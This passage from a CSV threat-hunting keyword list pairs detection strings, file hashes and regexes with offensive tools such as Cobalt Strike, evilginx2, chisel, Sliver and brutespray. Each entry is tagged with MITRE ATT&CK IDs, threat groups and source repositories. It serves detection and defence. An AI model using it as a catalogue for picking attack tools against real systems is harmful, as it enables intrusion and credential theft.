T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*BDED2735-F9E4-4B2E-9636-4EEDD78FC720*",".{0,1000}BDED2735\-F9E4\-4B2E\-9636\-4EEDD78FC720.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*bdf7dee28fc21a09ae10d5e3a75e3a7713e705e78a40f55a4c003c9358174372*",".{0,1000}bdf7dee28fc21a09ae10d5e3a75e3a7713e705e78a40f55a4c003c9358174372.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*BDFEE233-3FED-42E5-AA64-492EB2AC7047*",".{0,1000}BDFEE233\-3FED\-42E5\-AA64\-492EB2AC7047.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","N/A","8","7","656","94","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z" "*bdllinject*",".{0,1000}bdllinject.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*bdllinject*",".{0,1000}bdllinject.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bdllload*",".{0,1000}bdllload.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*bdllload*",".{0,1000}bdllload.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bdllspawn*",".{0,1000}bdllspawn.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*bdllspawn*",".{0,1000}bdllspawn.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*be03dfd28d37a8c444de321828edef417638c767a2a167133c5bf3a0b51ad60c*",".{0,1000}be03dfd28d37a8c444de321828edef417638c767a2a167133c5bf3a0b51ad60c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*be041565c155ce5a9129e2d79a2c8d18acf4143a7f3aa2237c15a15a89b6625e*",".{0,1000}be041565c155ce5a9129e2d79a2c8d18acf4143a7f3aa2237c15a15a89b6625e.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*be28f0c338095b629bfd563abd38c472c6b88618c3647a97c79f6c78cf620e15*",".{0,1000}be28f0c338095b629bfd563abd38c472c6b88618c3647a97c79f6c78cf620e15.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*be3ae8e7cd4138850830f1d0b40cb409160a4449dda205a325c95de7bd2b76b0*",".{0,1000}be3ae8e7cd4138850830f1d0b40cb409160a4449dda205a325c95de7bd2b76b0.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*be5cfdd35404d90af8b73a2c53fcc2e2ca3aafb2af4f5484b8aea25f8cb60e73*",".{0,1000}be5cfdd35404d90af8b73a2c53fcc2e2ca3aafb2af4f5484b8aea25f8cb60e73.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*be6d43b84e5b69c33f6e155d0e7be48bb3da4a322d19feac4073ef14b845f9fa*",".{0,1000}be6d43b84e5b69c33f6e155d0e7be48bb3da4a322d19feac4073ef14b845f9fa.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*be9b23c9cf6731a8ae3d288871d277e64ca0caa5020433c4516b58e10f5e641f*",".{0,1000}be9b23c9cf6731a8ae3d288871d277e64ca0caa5020433c4516b58e10f5e641f.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*be9bee58f25350d6047bcb9de5b38957d7591c7b048ddd0a2e69162252516a54*",".{0,1000}be9bee58f25350d6047bcb9de5b38957d7591c7b048ddd0a2e69162252516a54.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*Beacon Payload Generator*",".{0,1000}Beacon\sPayload\sGenerator.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*beacon.*winsrv.dll*",".{0,1000}beacon\..{0,1000}winsrv\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*beacon.CommandBuilder*",".{0,1000}beacon\.CommandBuilder.{0,1000}","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","10","10","467","73","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z" "*beacon.CommandBuilder*",".{0,1000}beacon\.CommandBuilder.{0,1000}","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*beacon.dll*",".{0,1000}beacon\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon.elf*",".{0,1000}beacon\.elf.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*beacon.exe*",".{0,1000}beacon\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon.exe*",".{0,1000}beacon\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","default articfact name generated by cobaltsrike Cobalt Strike is threat emulation software. Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon.nim*",".{0,1000}beacon\.nim.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF Files with Nim!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/byt3bl33d3r/BOF-Nim","1","1","N/A","10","10","85","13","2022-07-10T22:12:10Z","2021-01-12T18:58:23Z" "*Beacon.Object.File.zip*",".{0,1000}Beacon\.Object\.File\.zip.{0,1000}","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 